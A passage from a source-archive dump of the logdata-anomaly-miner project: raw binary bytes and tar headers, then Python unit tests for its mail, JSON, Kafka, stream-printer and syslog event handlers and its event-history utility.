C.eᅯRhh CH ̿Rhh Ct;q忔Rhh CbEӿRhh Cd?Rhh C0&ܿRhh C7JmѿRhh C@r (?Rhh C<?Rhh CWF.@+ᅯRhh CJӾ0w?Rhh CPQWfѿRhh C8[ ?Rhh C,Rhh CBylh?Rhh CRtտRhh CV"p?Rhh CP+N ?Rhh CLLZ?Rhh Cn˜?Rhh Cft9Rhh Cv/??Rhh Cc࿔Rhh CJxT῔Rhh C(%5 㿔Rhh CDC㿔Rhh Ch_{kEͿRhh C(oê?Rhh C2g߿Rhh C& ˞YRhh CRhh CL亿Rhh CRRhh C?r"?Rhh Ckp?Rhh Cn#?Rhh CTq塞Rhh C`,|Rhh CB?Rhh Cز$[$ȿRhh C5I?Rhh C?Rhh Ca8忔Rhh CH\?Rhh C?O쿔Rhh Cy?Rhh CP뿔Rhh C,ſRhh C,O῔Rhh C ٿRhh CBQ?Rhh CHa v?Rhh C٬^ͿRhh Cr?Rhh C:`dRhh C%{0?ᅯRhh CPHL?Rhh CFp)k?Rhh C sѿRhh C\УdտRhh CR) 1返Rhh C ]õpѿRhh C8Z忔Rhh Ct|F=?Rhh CNN῔Rhh Cp¿Rhh C0]l?Rhh CӸh꿔Rhh C*&?Rhh C"Ka?Rhh C t51?Rhh Cp?Rhh CRrDB?Rhh Cfd=Rhh CXR忔Rhh C(G27?Rhh CzČ9?Rhh CXEy=?Rhh CyC 㿔Rhh C:oRhh Ci쿔Rhh CE?Rhh Cד 0ؿRhh CլݿRhh C47_eҿRhh C/0#Fi返Rhh C=b?Rhh C~鼿Rhh C? 
῔Rhh Czy;ᅯRhh CnkWe濔Rhh C*cce?Rhh C"_?Rhh Cj2'⿔Rhh CϦӿRhh C\,yHFڿRhh CPymѿRhh CV ?Rhh C+ȴ?Rhh C}ɷ7?Rhh C>`3;꿔Rhh C:in쿔Rhh CνKqf?Rhh CL忔Rhh Cc2?Rhh C B*':?Rhh Cc޿Rhh C?Rhh CV׋TᅯRhh Cp;>x@࿔Rhh CWx ?Rhh CYU忔Rhh C?Rhh CzO}^??Rhh CMc ?Rhh CP^F߿Rhh C$q1?Rhh CxCzѿRhh C"ݿRhh CᅯRhh C QRhh C4#KڿRhh C\?Rhh CϿRhh Cxm'?Rhh C|,ܿRhh C1N?Rhh CU6D?Rhh C0?Rhh C`۞?Rhh Cf࿔Rhh C/HؿRhh Cĝ#Rhh COL?Rhh C8~返Rhh C–ʿRhh C+5E?Rhh CvJ"?Rhh C@ܿRhh C8濔Rhh C칺”ӿRhh C XB?Rhh C gįRhh CWT?Rhh Chz?Rhh Cxy\IѿRhh CB1鿔Rhh CAj*q׿Rhh CL{G?Rhh C j:wRhh Cm$Q忔Rhh C XAA?Rhh CgSRhh C{ܔ῔Rhh C> 0?Rhh C셡Ȕ忔Rhh CTc1?Rhh CE"+h?Rhh CH"US?Rhh Cx9(Q?Rhh C* ;m?Rhh CgJ0?Rhh CU<[;ᅯRhh C@@Q ۿRhh CY@r=?Rhh CU?Rhh Ce?Rhh CΧ]?Rhh C̚?Rhh C~U翔Rhh C̉?Rhh ChF͝,t?Rhh C5(ؿRhh C0^/{?Rhh Cl?hVW鿔Rhh C4=Al俔Rhh CxM࿔Rhh C*#v῔Rhh C`G Z?Rhh C8bl]࿔Rhh C%?Rhh C;4V 濔Rhh CD Sǵ?Rhh CjڿRhh CX8޿Rhh Cje?Rhh CЙO~࿔Rhh C7%<ᅯRhh Cj?Rhh CDg'֠?Rhh C#+.?Rhh C@ k ҿRhh CJѡN㿔Rhh CZ?Rhh CH={Rhh C8H#ͿRhh C w4?Rhh Cm 濔Re](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/000077500000000000000000000000001437606560100232705ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/DefaultMailNotificationEventHandlerTest.py000066400000000000000000000222741437606560100335470ustar00rootroot00000000000000import unittest import sys from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from time import time, sleep from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler # skipcq: BAN-B404 import subprocess from unit.TestBase import TestBase from datetime import datetime class DefaultMailNotificationEventHandlerTest(TestBase): """Unittests for the DefaultMailNotificationEventHandler.""" __expected_string = ' New value for pathes %s: %s\n%s: "%s" (%d lines)\n %s' mail_call = 'echo p | mail -u mail' mail_delete_call = 'echo d | mail 
 -u mail'
    # Fixed byte string that every FixedDataModelElement in these tests matches against.
    pid = b' pid='
    # Event type template; formatted with the test class name when calling receive_event.
    test = 'Test.%s'
    # Format used to look the event timestamps up in the delivered mail body.
    datetime_format_string = '%Y-%m-%d %H:%M:%S'

    def test1log_multiple_lines_event(self):
        """
        Receive two events before one mail is sent to root@localhost and check that both appear in the mail body.

        Make sure no mail notifications are in /var/spool/mail/root before running this test. The test waits a short
        time so that the delivered mail can be read back from the local spool.
        The mail is read and deleted with the fixed literal shell commands mail_call and mail_delete_call; nothing
        from the log atoms or match elements is interpolated into them, which is why shell=True is tolerated here.
        """
        description = "Test1DefaultMailNotificationEventHandler"
        match_context = MatchContext(self.pid)
        fixed_dme = FixedDataModelElement('s1', self.pid)
        match_element = fixed_dme.get_match_element("match", match_context)
        match_context = MatchContext(self.pid)
        fixed_dme2 = FixedDataModelElement('s2', self.pid)
        match_element2 = fixed_dme2.get_match_element("match", match_context)
        default_mail_notification_event_handler = DefaultMailNotificationEventHandler(self.analysis_context)
        self.analysis_context.register_component(self, description)
        t = time()
        log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self)
        default_mail_notification_event_handler.receive_event(
            self.test % self.__class__.__name__, 'New value for pathes %s, %s: %s' % (
                'match/s1', 'match/s2', repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)
        # Second event 600 seconds later, so both timestamps can be searched for in the mail.
        t += 600
        log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self)
        # set the next_alert_time instead of sleeping 10 seconds
        default_mail_notification_event_handler.next_alert_time = time()
        default_mail_notification_event_handler.receive_event(
            self.test % self.__class__.__name__, 'New value for pathes %s, %s: %s' % (
                'match/s1', 'match/s2', repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)
        sleep(2)
        # skipcq: PYL-W1510, BAN-B602
        result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE)
        # skipcq: PYL-W1510, BAN-B602
        subprocess.run(self.mail_delete_call, shell=True, stdout=subprocess.PIPE)
        # The two timestamp checks below only print a diagnostic to stderr; they do not fail the test.
        if datetime.fromtimestamp(t - 600).strftime(self.datetime_format_string) not in str(result.stdout, 'utf-8'):
            print("ERROR: %s t-600 not found in mail!" % description, file=sys.stderr)
        if datetime.fromtimestamp(t).strftime(self.datetime_format_string) not in str(result.stdout, 'utf-8'):
            print("ERROR: %s t not found in mail!" % description, file=sys.stderr)
        # NOTE(review): the msg= text formats the expected string with a single path and count 1, while the assertion
        # itself expects both paths and count 2, so the message shown on failure does not match what was checked.
        self.assertTrue(self.__expected_string % (
            "" + match_element.get_path() + ", " + match_element2.get_path(), repr(match_element.get_match_object()),
            self.__class__.__name__, description, 2,
            match_element.get_match_string().decode() + "\n " + match_element2.get_match_string().decode()) in str(result.stdout, 'utf-8'),
            msg="%s vs \n %s" % (self.__expected_string % (
                match_element.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 1,
                match_element.get_match_string().decode() + "\n\n"), str(result.stdout, 'utf-8')))
        # Same check again, this time including the trailing blank lines of the mail body.
        self.assertTrue(self.__expected_string % (
            "" + match_element.get_path() + ", " + match_element2.get_path(), repr(match_element.get_match_object()),
            self.__class__.__name__, description, 2,
            match_element.get_match_string().decode() + "\n " + match_element2.get_match_string().decode() + "\n\n") in str(result.stdout, 'utf-8'))

    def test2do_timer(self):
        """
        Exercise do_timer: with t = 0 and with a next_alert_time 500 seconds in the future no mail must be sent;
        once next_alert_time equals the current time the collected event must be delivered.
        """
        description = "Test2DefaultMailNotificationEventHandler"
        default_mail_notification_event_handler = DefaultMailNotificationEventHandler(self.analysis_context)
        self.analysis_context.register_component(self, description)
        t = time()
        match_context = MatchContext(self.pid)
        fixed_dme = FixedDataModelElement('s3', self.pid)
        match_element = fixed_dme.get_match_element("match", match_context)
        log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self)
        default_mail_notification_event_handler.receive_event(
            self.test % self.__class__.__name__, 'New value for pathes %s: %s' % (
                'match/s3', repr(match_element.match_object)), [log_atom.raw_data], None, log_atom, self)
        # do_timer at t = 0: nothing may be sent yet.
        t = 0
        default_mail_notification_event_handler.do_timer(t)
        # skipcq: PYL-W1510, BAN-B602
        result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE)
        self.assertFalse(self.__expected_string % (
            match_element.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 1,
            match_element.get_match_string().decode() + "\n\n") in str(result.stdout, 'utf-8'))
        # next_alert_time still in the future: still nothing may be sent.
        t = time()
        default_mail_notification_event_handler.next_alert_time = t + 500
        default_mail_notification_event_handler.do_timer(t)
        # skipcq: PYL-W1510, BAN-B602
        result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE)
        self.assertFalse(self.__expected_string % (
            match_element.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 1,
            match_element.get_match_string().decode() + "\n\n") in str(result.stdout, 'utf-8'))
        # next_alert_time reached: the mail must now be delivered.
        default_mail_notification_event_handler.next_alert_time = t
        default_mail_notification_event_handler.do_timer(t)
        sleep(2)
        # skipcq: PYL-W1510, BAN-B602
        result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE)
        # skipcq: PYL-W1510, BAN-B602
        subprocess.run(self.mail_delete_call, shell=True, stdout=subprocess.PIPE)
        # Diagnostic only; a missing timestamp is printed to stderr but does not fail the test.
        if datetime.fromtimestamp(t).strftime(self.datetime_format_string) not in str(result.stdout, 'utf-8'):
            print("ERROR: %s t not found in mail!" % description, file=sys.stderr)
        self.assertTrue(self.__expected_string % (
            match_element.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 1,
            match_element.get_match_string().decode() + "\n\n") in str(result.stdout, 'utf-8'), msg="%s vs \n %s" % (
                self.__expected_string % (
                    match_element.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 1,
                    match_element.get_match_string().decode() + "\n\n"), str(result.stdout, 'utf-8')))

    def test3check_email_addresses(self):
        """
        Test if mail addresses are validated as expected.

        Constructing the handler must succeed for test123@gmail.com and root@localhost as target and from address, but
        must raise for a dotted local part (domain.user1@localhost) and for the target address root@notLocalhost.
        """
        ac = self.analysis_context
        ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "test123@gmail.com"
        ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS] = "test123@gmail.com"
        _ = DefaultMailNotificationEventHandler(ac)
        ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "root@localhost"
        ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS] = "root@localhost"
        _ = DefaultMailNotificationEventHandler(ac)
        # Dotted local part in the target address must be rejected.
        ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "domain.user1@localhost"
        self.assertRaises(Exception, DefaultMailNotificationEventHandler, ac)
        # NOTE(review): the target address is still domain.user1@localhost here, so this assertion does not show that
        # the from address alone is rejected.
        ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS] = "domain.user1@localhost"
        self.assertRaises(Exception, DefaultMailNotificationEventHandler, ac)
        # Valid from address, but a target outside localhost must be rejected.
        ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "root@notLocalhost"
        ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS] = "root@localhost"
        self.assertRaises(Exception, DefaultMailNotificationEventHandler, ac)
ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "root@localhost" ac.aminer_config.config_properties[DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS] = "root@notLocalhost" self.assertRaises(Exception, DefaultMailNotificationEventHandler, ac) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/JsonConverterHandlerTest.py000066400000000000000000000052731437606560100306100ustar00rootroot00000000000000import time import unittest from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class JsonConverterHandlerTest(TestBase): """Unittests for the JsonConverterHandler.""" output_logline = True match_context = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') match_element = fixed_dme.get_match_element("match", match_context) t = time.time() test_detector = 'Analysis.TestDetector' event_message = 'An event happened!' 
sorted_log_lines = ['Event happend at /path/ 5 times.', '', '', '', ''] persistence_id = 'Default' description = 'jsonConverterHandlerDescription' expected_string = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 0,\n' \ ' "AnalysisComponentType": "%s",\n "AnalysisComponentName": "%s",\n "Message": "%s",\n' \ ' "PersistenceFileName": "%s",\n "AffectedParserPaths": [\n "test/path/1",\n' \ ' "test/path/2"\n ]\n },\n "LogData": {\n "RawLogData": [\n " pid="\n ],\n ' \ '"Timestamps": [\n %s\n ],\n "DetectionTimestamp": %s,\n "LogLinesCount": 5,\n' \ ' "AnnotatedMatchElement": {\n "match/s1": " pid="\n }\n }%s\n}\n' def test1receive_expected_event(self): """In this test case a normal Event happens and the json output should be sent to a StreamPrinterEventHandler.""" json_converter_handler = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) log_atom = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element), self.t, self) self.analysis_context.register_component(self, self.description) event_data = {'AnalysisComponent': {'AffectedParserPaths': ['test/path/1', 'test/path/2']}} json_converter_handler.receive_event(self.test_detector, self.event_message, self.sorted_log_lines, event_data, log_atom, self) detection_timestamp = None for line in self.output_stream.getvalue().split('\n'): if "DetectionTimestamp" in line: detection_timestamp = line.split(':')[1].strip(' ,') self.assertEqual(self.output_stream.getvalue(), self.expected_string % ( self.__class__.__name__, self.description, self.event_message, self.persistence_id, round(self.t, 2), detection_timestamp, "")) if __name__ == '__main__': unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/KafkaEventHandlerTest.py000066400000000000000000000107611437606560100300240ustar00rootroot00000000000000import time from kafka import KafkaConsumer from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.events.KafkaEventHandler import 
KafkaEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class KafkaEventHandlerTest(TestBase): """Unittests for the KafkaEventHandler.""" output_logline = True kafka_topic = 'test_topic' kafka_group = 'test_group' consumer = None match_context = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') other_data = 4 match_element = fixed_dme.get_match_element("match", match_context) description = 'jsonConverterHandlerDescription' t = time.time() persistence_id = 'Default' test_detector = 'Analysis.TestDetector' event_message = 'An event happened!' sorted_log_lines = ['Event happend at /path/ 5 times.', '', '', '', ''] expected_string = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 0,\n' \ ' "AnalysisComponentType": "%s",\n "AnalysisComponentName": "%s",\n "Message": "%s",\n' \ ' "PersistenceFileName": "%s",\n "AffectedParserPaths": [\n "test/path/1",\n' \ ' "test/path/2"\n ]\n },\n "LogData": {\n "RawLogData": [\n " pid="\n ],\n ' \ '"Timestamps": [\n %s\n ],\n "DetectionTimestamp": %s,\n "LogLinesCount": 5,\n' \ ' "AnnotatedMatchElement": {\n "match/s1": " pid="\n }\n }%s\n}\n' @classmethod def setUpClass(cls): """Start a KafkaConsumer.""" cls.consumer = KafkaConsumer( cls.kafka_topic, bootstrap_servers=['localhost:9092'], enable_auto_commit=True, consumer_timeout_ms=10000, group_id=cls.kafka_group, value_deserializer=lambda x: x.decode(), api_version=(2, 0, 1), auto_offset_reset='earliest') @classmethod def tearDownClass(cls): """Shutdown the KafkaConsumer.""" cls.consumer.close() def test1receive_serialized_data(self): """This unittest tests the receive_event method with serialized data from the JsonConverterHandler.""" json_converter_handler = JsonConverterHandler([self.stream_printer_event_handler], 
self.analysis_context) log_atom = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element), self.t, self) self.analysis_context.register_component(self, self.description) event_data = {'AnalysisComponent': {'AffectedParserPaths': ['test/path/1', 'test/path/2']}} json_converter_handler.receive_event(self.test_detector, self.event_message, self.sorted_log_lines, event_data, log_atom, self) output = self.output_stream.getvalue() kafka_event_handler = KafkaEventHandler(self.analysis_context, self.kafka_topic, { 'bootstrap_servers': ['localhost:9092'], 'api_version': (2, 0, 1)}) self.assertTrue(kafka_event_handler.receive_event(self.test_detector, self.event_message, self.sorted_log_lines, output, log_atom, self)) val = self.consumer.__next__().value detection_timestamp = None for line in val.split('\n'): if "DetectionTimestamp" in line: detection_timestamp = line.split(':')[1].strip(' ,') self.assertEqual(val, self.expected_string % ( self.__class__.__name__, self.description, self.event_message, self.persistence_id, round(self.t, 2), detection_timestamp, "")) def test2receive_non_serialized_data(self): """This unittest tests the receive_event method with not serialized data.""" log_atom = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element), self.t, self) self.analysis_context.register_component(self, self.description) event_data = {'AnalysisComponent': {'AffectedParserPaths': ['test/path/1', 'test/path/2']}} kafka_event_handler = KafkaEventHandler(self.analysis_context, self.kafka_topic, { 'bootstrap_servers': ['localhost:9092'], 'api_version': (2, 0, 1)}) self.assertFalse(kafka_event_handler.receive_event(self.test_detector, self.event_message, self.sorted_log_lines, event_data, log_atom, self)) self.assertRaises(StopIteration, self.consumer.__next__) logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/StreamPrinterEventHandlerTest.py000066400000000000000000000103111437606560100315750ustar00rootroot00000000000000import unittest from 
aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from time import time from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from unit.TestBase import TestBase from datetime import datetime class StreamPrinterEventHandlerTest(TestBase): """Unittests for the StreamPrinterEventHandler.""" __expectedString = '%s New value for pathes %s: %s\n%s: "%s" (%d lines)\n%s\n' pid = b' pid=' test = 'Test.%s' match_s1 = 'match/s1' match_s2 = 'match/s2' new_val = 'New value for pathes %s, %s: %s' def test1log_multiple_lines_event(self): """In this test case the EventHandler receives multiple lines from the test class.""" description = "Test1StreamPrinterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) match_context = MatchContext(self.pid) fixed_dme2 = FixedDataModelElement('s2', self.pid) match_element2 = fixed_dme2.get_match_element("match", match_context) self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) self.stream_printer_event_handler.receive_event( self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) self.assertEqual(self.output_stream.getvalue(), self.__expectedString % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), match_element.get_path() + ", " + match_element2.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 2, " " + match_element.get_match_string().decode() + "\n " + match_element2.get_match_string().decode() + "\n")) def test2log_no_line_event(self): """In this test case the EventHandler receives no lines from the test class.""" description = 
"Test2StreamPrinterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) match_context = MatchContext(self.pid) fixed_dme2 = FixedDataModelElement('s2', self.pid) match_element2 = fixed_dme2.get_match_element("match", match_context) self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) self.stream_printer_event_handler.receive_event( self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [], None, log_atom, self) self.assertEqual(self.output_stream.getvalue(), self.__expectedString % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), match_element.get_path() + ", " + match_element2.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 0, "")) def test3event_data_not_log_atom(self): """In this test case the EventHandler receives no logAtom from the test class and the method should raise an exception.""" description = "Test3StreamPrinterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) self.assertRaises(Exception, self.stream_printer_event_handler.receive_event, self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], log_atom.get_parser_match(), self) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/SyslogWriterEventHandlerTest.py000066400000000000000000000133171437606560100314640ustar00rootroot00000000000000import unittest from 
aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler from time import time, sleep from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import os from unit.TestBase import TestBase from datetime import datetime class SyslogWriterEventHandlerTest(TestBase): """Some of the test cases may fail if the same numbers as the PID are found in the syslog. Rerun the unit, when this happens.""" __expected_string = '[0] %s New value for pathes %s, %s: %s\n[0-1] %s: "%s" (%d lines)\n[0-2] %s\n[0-3] %s\n' __expected_string2 = '[0] %s New value for pathes %s, %s: %s\n[0-1] %s: "%s" (%d lines)\n' pid = b' pid=' test = 'Test.%s' match_s1 = 'match/s1' match_s2 = 'match/s2' new_val = 'New value for pathes %s, %s: %s' def test1log_multiple_lines_event(self): """In this test case the EventHandler receives multiple lines from the test class.""" description = "Test1SyslogWriterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) match_context = MatchContext(self.pid) fixed_dme2 = FixedDataModelElement('s2', self.pid) match_element2 = fixed_dme2.get_match_element("match", match_context) syslog_writer_event_handler = SyslogWriterEventHandler(self.analysis_context, 'aminer') self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) syslog_writer_event_handler.receive_event( self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) string = '' sleep(0.2) with open("/var/log/syslog") as search: for line in search: line = line.rstrip() # remove '\n' at end of line if 'aminer[' + 
str(os.getpid()) + ']' in line: line = line.split("]: ") string += (line[1]) + '\n' found = False string = string.split('Syslog logger initialized\n') expected = self.__expected_string % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), match_element.get_path(), match_element2.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 2, match_element.get_match_string().decode(), match_element2.get_match_string().decode()) for log in string: if expected in log: found = True self.assertTrue(found) def test2log_no_line_event(self): """In this test case the EventHandler receives no lines from the test class.""" description = "Test2SyslogWriterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) match_context = MatchContext(self.pid) fixed_dme2 = FixedDataModelElement('s2', self.pid) match_element2 = fixed_dme2.get_match_element("match", match_context) syslog_writer_event_handler = SyslogWriterEventHandler(self.analysis_context, 'aminer') self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) syslog_writer_event_handler.receive_event( self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [], None, log_atom, self) string = '' sleep(0.2) with open("/var/log/syslog") as search: for line in search: line = line.rstrip() # remove '\n' at end of line if 'aminer[' + str(os.getpid()) + ']' in line: line = line.split("]: ") string += (line[1]) + '\n' found = False string = string.split('Syslog logger initialized\n') expected = self.__expected_string2 % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), match_element.get_path(), match_element2.get_path(), repr(match_element.get_match_object()), self.__class__.__name__, description, 0) for log in string: if 
expected in log: found = True self.assertTrue(found) def test3event_data_not_log_atom(self): """In this test case the EventHandler receives no logAtom from the test class and the class should raise an exception.""" description = "Test3SyslogWriterEventHandler" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) self.analysis_context.register_component(self, description) syslog_writer_event_handler = SyslogWriterEventHandler(self.analysis_context, 'aminer') t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) self.assertRaises(Exception, syslog_writer_event_handler.receive_event, self.test % self.__class__.__name__, self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], log_atom.get_parser_match(), self) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/UtilsTest.py000066400000000000000000000175061437606560100256130ustar00rootroot00000000000000import unittest from aminer.events.Utils import VolatileLogarithmicBackoffEventHistory from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from time import time from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class UtilsTest(TestBase): """Unittests for the Utils.""" pid = b' pid=' test = 'Test.%s' match_s1 = 'match/s1' match_s2 = 'match/s2' new_val = 'New value for pathes %s, %s: %s ' def test1add_multiple_objects(self): """In this test case multiple events are received by the VolatileLogarithmicBackoffEventHistory.""" volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(10) match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = 
fixed_dme.get_match_element("match", match_context) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) message = self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom, self) self.assertEqual(volatile_logarithmic_backoff_event_history.get_history(), [ (0, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)]) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom, self) self.assertEqual(volatile_logarithmic_backoff_event_history.get_history(), [ (0, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self), (1, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)]) def test2add_no_objects(self): """In this test case no events are received by the VolatileLogarithmicBackoffEventHistory.""" volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(10) self.assertEqual(volatile_logarithmic_backoff_event_history.get_history(), []) def test3event_data_not_log_atom(self): """In this test case the EventHandler receives no logAtom from the test class and the output should not contain the log time.""" volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(10) match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) message = self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)) 
volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) self.assertEqual( volatile_logarithmic_backoff_event_history.get_history(), [ (0, self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]) def test4max_items_overflow(self): """In this test case more events than the VolatileLogarithmicBackoffEventHistory can handle are received.""" deviation = 0.05 size = 100000 msg = "%s=%f is not between %f and %f" match_context = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element = fixed_dme.get_match_element("match", match_context) t = time() log_atom = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element), t, self) message = self.new_val % (self.match_s1, self.match_s2, repr(match_element.match_object)) first = 0 second = 0 third = 0 fourth = 0 for _ in range(size): volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(2) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, 